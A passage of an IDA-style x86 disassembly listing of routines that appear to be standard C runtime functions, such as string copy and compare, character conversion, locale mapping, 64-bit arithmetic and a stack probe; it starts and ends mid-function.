mov edi, [ebx+8]
loc_410513: ; CODE XREF: sub_4104E0+90�j
cmp esi, 0FFFFFFFFh
jz short loc_410579
lea ecx, [esi+esi*2]
cmp dword ptr [edi+ecx*4+4], 0
jz short loc_410567
push esi
push ebp
lea ebp, [ebx+10h]
call dword ptr [edi+ecx*4+4]
pop ebp
pop esi
mov ebx, [ebp+arg_4]
or eax, eax
jz short loc_410567
js short loc_410572
mov edi, [ebx+8]
push ebx
call sub_4103E8
add esp, 4
lea ebp, [ebx+10h]
push esi
push ebx
call sub_41042A
add esp, 8
lea ecx, [esi+esi*2]
push 1
mov eax, [edi+ecx*4+8]
call sub_4104BE
mov eax, [edi+ecx*4]
mov [ebx+0Ch], eax
call dword ptr [edi+ecx*4+8]
loc_410567: ; CODE XREF: sub_4104E0+40�j
; sub_4104E0+52�j
mov edi, [ebx+8]
lea ecx, [esi+esi*2]
mov esi, [edi+ecx*4]
jmp short loc_410513
; ---------------------------------------------------------------------------
loc_410572: ; CODE XREF: sub_4104E0+54�j
mov eax, 0
jmp short loc_410595
; ---------------------------------------------------------------------------
loc_410579: ; CODE XREF: sub_4104E0+36�j
mov eax, 1
jmp short loc_410595
; ---------------------------------------------------------------------------
loc_410580: ; CODE XREF: sub_4104E0+18�j
push ebp
lea ebp, [ebx+10h]
push 0FFFFFFFFh
push ebx
call sub_41042A
add esp, 8
pop ebp
mov eax, 1
loc_410595: ; CODE XREF: sub_4104E0+97�j
; sub_4104E0+9E�j
pop ebp
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_4104E0 endp
; ---------------------------------------------------------------------------
push ebp
mov ecx, [esp+8]
mov ebp, [ecx]
mov eax, [ecx+1Ch]
push eax
mov eax, [ecx+18h]
push eax
call sub_41042A
add esp, 8
pop ebp
retn 4
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4105C0 proc near ; CODE XREF: sub_413186+2A�p
; sub_413272+FB�p ...
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
push ebp
mov ebp, esp
push edi
mov edi, [ebp+arg_0]
xor eax, eax
or ecx, 0FFFFFFFFh
repne scasb
inc ecx
neg ecx
dec edi
mov al, [ebp+arg_4]
std
repne scasb
inc edi
cmp [edi], al
jz short loc_4105E1
xor eax, eax
jmp short loc_4105E3
; ---------------------------------------------------------------------------
loc_4105E1: ; CODE XREF: sub_4105C0+1B�j
mov eax, edi
loc_4105E3: ; CODE XREF: sub_4105C0+1F�j
cld
pop edi
leave
retn
sub_4105C0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4105F0 proc near ; CODE XREF: sub_41553D+145�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push edi
push esi
push ebx
mov ecx, [ebp+arg_8]
jecxz short loc_410621
mov ebx, ecx
mov edi, [ebp+arg_0]
mov esi, edi
xor eax, eax
repne scasb
neg ecx
add ecx, ebx
mov edi, esi
mov esi, [ebp+arg_4]
repe cmpsb
mov al, [esi-1]
xor ecx, ecx
cmp al, [edi-1]
ja short loc_41061F
jz short loc_410621
dec ecx
dec ecx
loc_41061F: ; CODE XREF: sub_4105F0+29�j
not ecx
loc_410621: ; CODE XREF: sub_4105F0+9�j
; sub_4105F0+2B�j
mov eax, ecx
pop ebx
pop esi
pop edi
leave
retn
sub_4105F0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_410630 proc near ; CODE XREF: sub_415B59+1AF�p
; sub_415B59+434�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov ecx, [esp+arg_8]
push edi
test ecx, ecx
jz short loc_4106B3
push esi
push ebx
mov ebx, ecx
mov esi, [esp+0Ch+arg_4]
test esi, 3
mov edi, [esp+0Ch+arg_0]
jnz short loc_410654
shr ecx, 2
jnz short loc_4106C1
jmp short loc_410675
; ---------------------------------------------------------------------------
loc_410654: ; CODE XREF: sub_410630+1B�j
; sub_410630+37�j
mov al, [esi]
inc esi
mov [edi], al
inc edi
dec ecx
jz short loc_410682
test al, al
jz short loc_41068A
test esi, 3
jnz short loc_410654
mov ebx, ecx
shr ecx, 2
jnz short loc_4106C1
loc_410670: ; CODE XREF: sub_410630+8F�j
and ebx, 3
jz short loc_410682
loc_410675: ; CODE XREF: sub_410630+22�j
; sub_410630+50�j
mov al, [esi]
inc esi
mov [edi], al
inc edi
test al, al
jz short loc_4106AE
dec ebx
jnz short loc_410675
loc_410682: ; CODE XREF: sub_410630+2B�j
; sub_410630+43�j
mov eax, [esp+0Ch+arg_0]
pop ebx
pop esi
pop edi
retn
; ---------------------------------------------------------------------------
loc_41068A: ; CODE XREF: sub_410630+2F�j
test edi, 3
jz short loc_4106A4
loc_410692: ; CODE XREF: sub_410630+72�j
mov [edi], al
inc edi
dec ecx
jz loc_410726
test edi, 3
jnz short loc_410692
loc_4106A4: ; CODE XREF: sub_410630+60�j
mov ebx, ecx
shr ecx, 2
jnz short loc_410717
loc_4106AB: ; CODE XREF: sub_410630+7F�j
; sub_410630+F4�j
mov [edi], al
inc edi
loc_4106AE: ; CODE XREF: sub_410630+4D�j
dec ebx
jnz short loc_4106AB
pop ebx
pop esi
loc_4106B3: ; CODE XREF: sub_410630+7�j
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_4106B9: ; CODE XREF: sub_410630+A9�j
; sub_410630+C1�j
mov [edi], edx
add edi, 4
dec ecx
jz short loc_410670
loc_4106C1: ; CODE XREF: sub_410630+20�j
; sub_410630+3E�j
mov edx, 7EFEFEFFh
mov eax, [esi]
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
mov edx, [esi]
add esi, 4
test eax, 81010100h
jz short loc_4106B9
test dl, dl
jz short loc_41070B
test dh, dh
jz short loc_410701
test edx, 0FF0000h
jz short loc_4106F7
test edx, 0FF000000h
jnz short loc_4106B9
mov [edi], edx
jmp short loc_41070F
; ---------------------------------------------------------------------------
loc_4106F7: ; CODE XREF: sub_410630+B9�j
and edx, 0FFFFh
mov [edi], edx
jmp short loc_41070F
; ---------------------------------------------------------------------------
loc_410701: ; CODE XREF: sub_410630+B1�j
and edx, 0FFh
mov [edi], edx
jmp short loc_41070F
; ---------------------------------------------------------------------------
loc_41070B: ; CODE XREF: sub_410630+AD�j
xor edx, edx
mov [edi], edx
loc_41070F: ; CODE XREF: sub_410630+C5�j
; sub_410630+CF�j ...
add edi, 4
xor eax, eax
dec ecx
jz short loc_410721
loc_410717: ; CODE XREF: sub_410630+79�j
xor eax, eax
loc_410719: ; CODE XREF: sub_410630+EF�j
mov [edi], eax
add edi, 4
dec ecx
jnz short loc_410719
loc_410721: ; CODE XREF: sub_410630+E5�j
and ebx, 3
jnz short loc_4106AB
loc_410726: ; CODE XREF: sub_410630+66�j
mov eax, [esp+0Ch+arg_0]
pop ebx
pop esi
pop edi
retn
sub_410630 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41072E proc near ; CODE XREF: sub_4100D6+24�p
; sub_4100D6+2F�p ...
var_4 = byte ptr -4
var_3 = byte ptr -3
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
cmp ds:dword_429054, 0
push ebx
push esi
push edi
jnz short loc_41075B
mov eax, [ebp+arg_0]
cmp eax, 41h
jl loc_4107F4
cmp eax, 5Ah
jg loc_4107F4
add eax, 20h
jmp loc_4107F4
; ---------------------------------------------------------------------------
loc_41075B: ; CODE XREF: sub_41072E+E�j
mov ebx, [ebp+arg_0]
mov edi, 100h
push 1
cmp ebx, edi
pop esi
jge short loc_41078F
cmp ds:dword_4245DC, esi
jle short loc_41077D
push esi
push ebx
call sub_410C5F
pop ecx
pop ecx
jmp short loc_410787
; ---------------------------------------------------------------------------
loc_41077D: ; CODE XREF: sub_41072E+42�j
mov eax, ds:off_4243D0
mov al, [eax+ebx*2]
and eax, esi
loc_410787: ; CODE XREF: sub_41072E+4D�j
test eax, eax
jnz short loc_41078F
loc_41078B: ; CODE XREF: sub_41072E+AD�j
mov eax, ebx
jmp short loc_4107F4
; ---------------------------------------------------------------------------
loc_41078F: ; CODE XREF: sub_41072E+3A�j
; sub_41072E+5B�j
mov edx, ds:off_4243D0
mov eax, ebx
sar eax, 8
movzx ecx, al
test byte ptr [edx+ecx*2+1], 80h
jz short loc_4107B3
and byte ptr [ebp+arg_0+2], 0
push 2
mov byte ptr [ebp+arg_0], al
mov byte ptr [ebp+arg_0+1], bl
pop eax
jmp short loc_4107BC
; ---------------------------------------------------------------------------
loc_4107B3: ; CODE XREF: sub_41072E+74�j
and byte ptr [ebp+arg_0+1], 0
mov byte ptr [ebp+arg_0], bl
mov eax, esi
loc_4107BC: ; CODE XREF: sub_41072E+83�j
push esi
push 0
lea ecx, [ebp+var_4]
push 3
push ecx
push eax
lea eax, [ebp+arg_0]
push eax
push edi
push ds:dword_429054
call sub_410A10
add esp, 20h
test eax, eax
jz short loc_41078B
cmp eax, esi
jnz short loc_4107E7
movzx eax, [ebp+var_4]
jmp short loc_4107F4
; ---------------------------------------------------------------------------
loc_4107E7: ; CODE XREF: sub_41072E+B1�j
movzx eax, [ebp+var_3]
movzx ecx, [ebp+var_4]
shl eax, 8
or eax, ecx
loc_4107F4: ; CODE XREF: sub_41072E+16�j
; sub_41072E+1F�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_41072E endp
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_410810
loc_410800: ; CODE XREF: sub_410810+1D�j
lea eax, [edx-1]
pop ebx
retn
; END OF FUNCTION CHUNK FOR sub_410810
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_410810 proc near ; CODE XREF: sub_41C106+AF�p
; sub_41C106+122�p
arg_0 = dword ptr 4
arg_4 = byte ptr 8
; FUNCTION CHUNK AT 00410800 SIZE 00000005 BYTES
xor eax, eax
mov al, [esp+arg_4]
push ebx
mov ebx, eax
shl eax, 8
mov edx, [esp+4+arg_0]
test edx, 3
jz short loc_41083B
loc_410828: ; CODE XREF: sub_410810+29�j
mov cl, [edx]
inc edx
cmp cl, bl
jz short loc_410800
test cl, cl
jz short loc_410884
test edx, 3
jnz short loc_410828
loc_41083B: ; CODE XREF: sub_410810+16�j
or ebx, eax
push edi
mov eax, ebx
shl ebx, 10h
push esi
or ebx, eax
loc_410846: ; CODE XREF: sub_410810+61�j
; sub_410810+70�j ...
mov ecx, [edx]
mov edi, 7EFEFEFFh
mov eax, ecx
mov esi, edi
xor ecx, ebx
add esi, eax
add edi, ecx
xor ecx, 0FFFFFFFFh
xor eax, 0FFFFFFFFh
xor ecx, edi
xor eax, esi
add edx, 4
and ecx, 81010100h
jnz short loc_410888
and eax, 81010100h
jz short loc_410846
and eax, 1010100h
jnz short loc_410882
and esi, 80000000h
jnz short loc_410846
loc_410882: ; CODE XREF: sub_410810+68�j
; sub_410810+81�j ...
pop esi
pop edi
loc_410884: ; CODE XREF: sub_410810+21�j
pop ebx
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_410888: ; CODE XREF: sub_410810+5A�j
mov eax, [edx-4]
cmp al, bl
jz short loc_4108C5
test al, al
jz short loc_410882
cmp ah, bl
jz short loc_4108BE
test ah, ah
jz short loc_410882
shr eax, 10h
cmp al, bl
jz short loc_4108B7
test al, al
jz short loc_410882
cmp ah, bl
jz short loc_4108B0
test ah, ah
jz short loc_410882
jmp short loc_410846
; ---------------------------------------------------------------------------
loc_4108B0: ; CODE XREF: sub_410810+98�j
pop esi
pop edi
lea eax, [edx-1]
pop ebx
retn
; ---------------------------------------------------------------------------
loc_4108B7: ; CODE XREF: sub_410810+90�j
lea eax, [edx-2]
pop esi
pop edi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_4108BE: ; CODE XREF: sub_410810+85�j
lea eax, [edx-3]
pop esi
pop edi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_4108C5: ; CODE XREF: sub_410810+7D�j
lea eax, [edx-4]
pop esi
pop edi
pop ebx
retn
sub_410810 endp
; ---------------------------------------------------------------------------
align 10h
push edi
push esi
push ebx
xor edi, edi
mov eax, [esp+14h]
or eax, eax
jge short loc_4108F1
inc edi
mov edx, [esp+10h]
neg eax
neg edx
sbb eax, 0
mov [esp+14h], eax
mov [esp+10h], edx
loc_4108F1: ; CODE XREF: _3:004108DB�j
mov eax, [esp+1Ch]
or eax, eax
jge short loc_41090D
inc edi
mov edx, [esp+18h]
neg eax
neg edx
sbb eax, 0
mov [esp+1Ch], eax
mov [esp+18h], edx
loc_41090D: ; CODE XREF: _3:004108F7�j
or eax, eax
jnz short loc_410929
mov ecx, [esp+18h]
mov eax, [esp+14h]
xor edx, edx
div ecx
mov ebx, eax
mov eax, [esp+10h]
div ecx
mov edx, ebx
jmp short loc_41096A
; ---------------------------------------------------------------------------
loc_410929: ; CODE XREF: _3:0041090F�j
mov ebx, eax
mov ecx, [esp+18h]
mov edx, [esp+14h]
mov eax, [esp+10h]
loc_410937: ; CODE XREF: _3:00410941�j
shr ebx, 1
rcr ecx, 1
shr edx, 1
rcr eax, 1
or ebx, ebx
jnz short loc_410937
div ecx
mov esi, eax
mul dword ptr [esp+1Ch]
mov ecx, eax
mov eax, [esp+18h]
mul esi
add edx, ecx
jb short loc_410965
cmp edx, [esp+14h]
ja short loc_410965
jb short loc_410966
cmp eax, [esp+10h]
jbe short loc_410966
loc_410965: ; CODE XREF: _3:00410955�j _3:0041095B�j
dec esi
loc_410966: ; CODE XREF: _3:0041095D�j _3:00410963�j
xor edx, edx
mov eax, esi
loc_41096A: ; CODE XREF: _3:00410927�j
dec edi
jnz short loc_410974
neg edx
neg eax
sbb edx, 0
loc_410974: ; CODE XREF: _3:0041096B�j
pop ebx
pop esi
pop edi
retn 10h
; =============== S U B R O U T I N E =======================================
sub_41097A proc near ; CODE XREF: sub_410A05+4�p
arg_0 = dword ptr 4
push ebx
push ebp
push esi
push edi
mov edi, [esp+10h+arg_0]
loc_410982: ; CODE XREF: sub_41097A+34�j
cmp ds:dword_4245DC, 1
jle short loc_41099A
movzx eax, byte ptr [edi]
push 8
push eax
call sub_410C5F
pop ecx
pop ecx
jmp short loc_4109A9
; ---------------------------------------------------------------------------
loc_41099A: ; CODE XREF: sub_41097A+F�j
movzx eax, byte ptr [edi]
mov ecx, ds:off_4243D0
mov al, [ecx+eax*2]
and eax, 8
loc_4109A9: ; CODE XREF: sub_41097A+1E�j
test eax, eax
jz short loc_4109B0
inc edi
jmp short loc_410982
; ---------------------------------------------------------------------------
loc_4109B0: ; CODE XREF: sub_41097A+31�j
movzx esi, byte ptr [edi]
inc edi
cmp esi, 2Dh
mov ebp, esi
jz short loc_4109C0
cmp esi, 2Bh
jnz short loc_4109C4
loc_4109C0: ; CODE XREF: sub_41097A+3F�j
movzx esi, byte ptr [edi]
inc edi
loc_4109C4: ; CODE XREF: sub_41097A+44�j
xor ebx, ebx
loc_4109C6: ; CODE XREF: sub_41097A+7B�j
cmp ds:dword_4245DC, 1
jle short loc_4109DB
push 4
push esi
call sub_410C5F
pop ecx
pop ecx
jmp short loc_4109E6
; ---------------------------------------------------------------------------
loc_4109DB: ; CODE XREF: sub_41097A+53�j
mov eax, ds:off_4243D0
mov al, [eax+esi*2]
and eax, 4
loc_4109E6: ; CODE XREF: sub_41097A+5F�j
test eax, eax
jz short loc_4109F7
lea eax, [ebx+ebx*4]
lea ebx, [esi+eax*2-30h]
movzx esi, byte ptr [edi]
inc edi
jmp short loc_4109C6
; ---------------------------------------------------------------------------
loc_4109F7: ; CODE XREF: sub_41097A+6E�j
cmp ebp, 2Dh
mov eax, ebx
jnz short loc_410A00
neg eax
loc_410A00: ; CODE XREF: sub_41097A+82�j
pop edi
pop esi
pop ebp
pop ebx
retn
sub_41097A endp
; =============== S U B R O U T I N E =======================================
sub_410A05 proc near ; CODE XREF: sub_41DFF8+5F�p
arg_0 = dword ptr 4
push [esp+arg_0]
call sub_41097A
pop ecx
retn
sub_410A05 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410A10 proc near ; CODE XREF: sub_41072E+A3�p
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_421A88
push offset sub_4104E0
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 1Ch
push ebx
push esi
push edi
mov [ebp+var_18], esp
xor edi, edi
cmp ds:dword_429048, edi
jnz short loc_410A86
push edi
push edi
push 1
pop ebx
push ebx
push offset dword_421A80
mov esi, 100h
push esi
push edi
call ds:dword_421030 ; LCMapStringW
test eax, eax
jz short loc_410A64
mov ds:dword_429048, ebx
jmp short loc_410A86
; ---------------------------------------------------------------------------
loc_410A64: ; CODE XREF: sub_410A10+4A�j
push edi
push edi
push ebx
push offset dword_421A7C
push esi
push edi
call ds:dword_421040 ; LCMapStringA
test eax, eax
jz loc_410B9E
mov ds:dword_429048, 2
loc_410A86: ; CODE XREF: sub_410A10+2E�j
; sub_410A10+52�j
cmp [ebp+arg_C], edi
jle short loc_410A9B
push [ebp+arg_C]
push [ebp+arg_8]
call sub_410C34
pop ecx
pop ecx
mov [ebp+arg_C], eax
loc_410A9B: ; CODE XREF: sub_410A10+79�j
mov eax, ds:dword_429048
cmp eax, 2
jnz short loc_410AC2
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_421040 ; LCMapStringA
jmp loc_410BA0
; ---------------------------------------------------------------------------
loc_410AC2: ; CODE XREF: sub_410A10+93�j
cmp eax, 1
jnz loc_410B9E
cmp [ebp+arg_18], edi
jnz short loc_410AD8
mov eax, ds:dword_429064
mov [ebp+arg_18], eax
loc_410AD8: ; CODE XREF: sub_410A10+BE�j
push edi
push edi
push [ebp+arg_C]
push [ebp+arg_8]
mov eax, [ebp+arg_1C]
neg eax
sbb eax, eax
and eax, 8
inc eax
push eax
push [ebp+arg_18]
call ds:dword_42103C ; MultiByteToWideChar
mov ebx, eax
mov [ebp+var_1C], ebx
cmp ebx, edi
jz loc_410B9E
mov [ebp+var_4], edi
lea eax, [ebx+ebx]
add eax, 3
and al, 0FCh
call sub_410D20
mov [ebp+var_18], esp
mov eax, esp
mov [ebp+var_24], eax
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_410B33
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
xor edi, edi
mov [ebp+var_24], edi
or [ebp+var_4], 0FFFFFFFFh
mov ebx, [ebp+var_1C]
loc_410B33: ; CODE XREF: sub_410A10+10E�j
cmp [ebp+var_24], edi
jz short loc_410B9E
push ebx
push [ebp+var_24]
push [ebp+arg_C]
push [ebp+arg_8]
push 1
push [ebp+arg_18]
call ds:dword_42103C ; MultiByteToWideChar
test eax, eax
jz short loc_410B9E
push edi
push edi
push ebx
push [ebp+var_24]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_421030 ; LCMapStringW
mov esi, eax
mov [ebp+var_28], esi
cmp esi, edi
jz short loc_410B9E
test byte ptr [ebp+arg_4+1], 4
jz short loc_410BB2
cmp [ebp+arg_14], edi
jz loc_410C2D
cmp esi, [ebp+arg_14]
jg short loc_410B9E
push [ebp+arg_14]
push [ebp+arg_10]
push ebx
push [ebp+var_24]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_421030 ; LCMapStringW
test eax, eax
jnz loc_410C2D
loc_410B9E: ; CODE XREF: sub_410A10+66�j
; sub_410A10+B5�j ...
xor eax, eax
loc_410BA0: ; CODE XREF: sub_410A10+AD�j
; sub_410A10+21F�j
lea esp, [ebp-38h]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_410BB2: ; CODE XREF: sub_410A10+160�j
mov [ebp+var_4], 1
lea eax, [esi+esi]
add eax, 3
and al, 0FCh
call sub_410D20
mov [ebp+var_18], esp
mov ebx, esp
mov [ebp+var_20], ebx
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_410BE6
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
xor edi, edi
xor ebx, ebx
or [ebp+var_4], 0FFFFFFFFh
mov esi, [ebp+var_28]
loc_410BE6: ; CODE XREF: sub_410A10+1C2�j
cmp ebx, edi
jz short loc_410B9E
push esi
push ebx
push [ebp+var_1C]
push [ebp+var_24]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_421030 ; LCMapStringW
test eax, eax
jz short loc_410B9E
cmp [ebp+arg_14], edi
push edi
push edi
jnz short loc_410C0D
push edi
push edi
jmp short loc_410C13
; ---------------------------------------------------------------------------
loc_410C0D: ; CODE XREF: sub_410A10+1F7�j
push [ebp+arg_14]
push [ebp+arg_10]
loc_410C13: ; CODE XREF: sub_410A10+1FB�j
push esi
push ebx
push 220h
push [ebp+arg_18]
call ds:dword_421038 ; WideCharToMultiByte
mov esi, eax
cmp esi, edi
jz loc_410B9E
loc_410C2D: ; CODE XREF: sub_410A10+165�j
; sub_410A10+188�j
mov eax, esi
jmp loc_410BA0
sub_410A10 endp
; =============== S U B R O U T I N E =======================================
sub_410C34 proc near ; CODE XREF: sub_410A10+81�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov edx, [esp+arg_4]
mov eax, [esp+arg_0]
test edx, edx
push esi
lea ecx, [edx-1]
jz short loc_410C51
loc_410C44: ; CODE XREF: sub_410C34+1B�j
cmp byte ptr [eax], 0
jz short loc_410C51
inc eax
mov esi, ecx
dec ecx
test esi, esi
jnz short loc_410C44
loc_410C51: ; CODE XREF: sub_410C34+E�j
; sub_410C34+13�j
cmp byte ptr [eax], 0
pop esi
jnz short loc_410C5C
sub eax, [esp+arg_0]
retn
; ---------------------------------------------------------------------------
loc_410C5C: ; CODE XREF: sub_410C34+21�j
mov eax, edx
retn
sub_410C34 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410C5F proc near ; CODE XREF: sub_41072E+46�p
; sub_41097A+17�p ...
var_4 = byte ptr -4
var_3 = byte ptr -3
var_2 = byte ptr -2
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_0]
lea ecx, [eax+1]
cmp ecx, 100h
ja short loc_410C7D
mov ecx, ds:off_4243D0
movzx eax, word ptr [ecx+eax*2]
jmp short loc_410CCF
; ---------------------------------------------------------------------------
loc_410C7D: ; CODE XREF: sub_410C5F+10�j
mov ecx, eax
push esi
mov esi, ds:off_4243D0
sar ecx, 8
movzx edx, cl
test byte ptr [esi+edx*2+1], 80h
pop esi
jz short loc_410CA2
and [ebp+var_2], 0
mov [ebp+var_4], cl
mov [ebp+var_3], al
push 2
jmp short loc_410CAB
; ---------------------------------------------------------------------------
loc_410CA2: ; CODE XREF: sub_410C5F+33�j
and [ebp+var_3], 0
mov [ebp+var_4], al
push 1
loc_410CAB: ; CODE XREF: sub_410C5F+41�j
pop eax
lea ecx, [ebp+arg_0+2]
push 1
push 0
push 0
push ecx
push eax
lea eax, [ebp+var_4]
push eax
push 1
call sub_410D4F
add esp, 1Ch
test eax, eax
jnz short loc_410CCB
leave
retn
; ---------------------------------------------------------------------------
loc_410CCB: ; CODE XREF: sub_410C5F+68�j
movzx eax, word ptr [ebp+arg_0+2]
loc_410CCF: ; CODE XREF: sub_410C5F+1C�j
and eax, [ebp+arg_4]
leave
retn
sub_410C5F endp
; ---------------------------------------------------------------------------
align 10h
mov eax, [esp+8]
mov ecx, [esp+10h]
or ecx, eax
mov ecx, [esp+0Ch]
jnz short loc_410CF9
mov eax, [esp+4]
mul ecx
retn 10h
; ---------------------------------------------------------------------------
loc_410CF9: ; CODE XREF: _3:00410CEE�j
push ebx
mul ecx
mov ebx, eax
mov eax, [esp+8]
mul dword ptr [esp+14h]
add ebx, eax
mov eax, [esp+8]
mul ecx
add edx, ebx
pop ebx
retn 10h
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_410D20 proc near ; CODE XREF: sub_410A10+FD�p
; sub_410A10+1B1�p ...
arg_0 = byte ptr 4
push ecx
cmp eax, 1000h
lea ecx, [esp+4+arg_0]
jb short loc_410D40
loc_410D2C: ; CODE XREF: sub_410D20+1E�j
sub ecx, 1000h
sub eax, 1000h
test [ecx], eax
cmp eax, 1000h
jnb short loc_410D2C
loc_410D40: ; CODE XREF: sub_410D20+A�j
sub ecx, eax
mov eax, esp
test [ecx], eax
mov esp, ecx
mov ecx, [eax]
mov eax, [eax+4]
push eax
retn
sub_410D20 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410D4F proc near ; CODE XREF: sub_410C5F+5E�p
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_421AA0
push offset sub_4104E0
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 18h
push ebx
push esi
push edi
mov [ebp+var_18], esp
mov eax, ds:dword_42906C
xor ebx, ebx
cmp eax, ebx
jnz short loc_410DBE
lea eax, [ebp+var_1C]
push eax
push 1
pop esi
push esi
push offset dword_421A80
push esi
call ds:dword_421044 ; GetStringTypeW
test eax, eax
jz short loc_410D9C
mov eax, esi
jmp short loc_410DB9
; ---------------------------------------------------------------------------
loc_410D9C: ; CODE XREF: sub_410D4F+47�j
lea eax, [ebp+var_1C]
push eax
push esi
push offset dword_421A7C
push esi
push ebx
call ds:dword_42102C ; GetStringTypeA
test eax, eax
jz loc_410E84
push 2
pop eax
loc_410DB9: ; CODE XREF: sub_410D4F+4B�j
mov ds:dword_42906C, eax
loc_410DBE: ; CODE XREF: sub_410D4F+2F�j
cmp eax, 2
jnz short loc_410DE7
mov eax, [ebp+arg_14]
cmp eax, ebx
jnz short loc_410DCF
mov eax, ds:dword_429054
loc_410DCF: ; CODE XREF: sub_410D4F+79�j
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
push eax
call ds:dword_42102C ; GetStringTypeA
jmp loc_410E86
; ---------------------------------------------------------------------------
loc_410DE7: ; CODE XREF: sub_410D4F+72�j
cmp eax, 1
jnz loc_410E84
cmp [ebp+arg_10], ebx
jnz short loc_410DFD
mov eax, ds:dword_429064
mov [ebp+arg_10], eax
loc_410DFD: ; CODE XREF: sub_410D4F+A4�j
push ebx
push ebx
push [ebp+arg_8]
push [ebp+arg_4]
mov eax, [ebp+arg_18]
neg eax
sbb eax, eax
and eax, 8
inc eax
push eax
push [ebp+arg_10]
call ds:dword_42103C ; MultiByteToWideChar
mov [ebp+var_20], eax
cmp eax, ebx
jz short loc_410E84
mov [ebp+var_4], ebx
lea edi, [eax+eax]
mov eax, edi
add eax, 3
and al, 0FCh
call sub_410D20
mov [ebp+var_18], esp
mov esi, esp
mov [ebp+var_24], esi
push edi
push ebx
push esi
call sub_410EA0
add esp, 0Ch
jmp short loc_410E53
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
xor ebx, ebx
xor esi, esi
loc_410E53: ; CODE XREF: sub_410D4F+F7�j
or [ebp+var_4], 0FFFFFFFFh
cmp esi, ebx
jz short loc_410E84
push [ebp+var_20]
push esi
push [ebp+arg_8]
push [ebp+arg_4]
push 1
push [ebp+arg_10]
call ds:dword_42103C ; MultiByteToWideChar
cmp eax, ebx
jz short loc_410E84
push [ebp+arg_C]
push eax
push esi
push [ebp+arg_0]
call ds:dword_421044 ; GetStringTypeW
jmp short loc_410E86
; ---------------------------------------------------------------------------
loc_410E84: ; CODE XREF: sub_410D4F+61�j
; sub_410D4F+9B�j ...
xor eax, eax
loc_410E86: ; CODE XREF: sub_410D4F+93�j
; sub_410D4F+133�j
lea esp, [ebp-34h]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
sub_410D4F endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_410EA0 proc near ; CODE XREF: sub_410D4F+EF�p
arg_0 = dword ptr 4
arg_4 = byte ptr 8
arg_8 = dword ptr 0Ch
mov edx, [esp+arg_8]
mov ecx, [esp+arg_0]
test edx, edx
jz short loc_410EF3
xor eax, eax
mov al, [esp+arg_4]
push edi
mov edi, ecx
cmp edx, 4
jb short loc_410EE7
neg ecx
and ecx, 3
jz short loc_410EC9
sub edx, ecx
loc_410EC3: ; CODE XREF: sub_410EA0+27�j
mov [edi], al
inc edi
dec ecx
jnz short loc_410EC3
loc_410EC9: ; CODE XREF: sub_410EA0+1F�j
mov ecx, eax
shl eax, 8
add eax, ecx
mov ecx, eax
shl eax, 10h
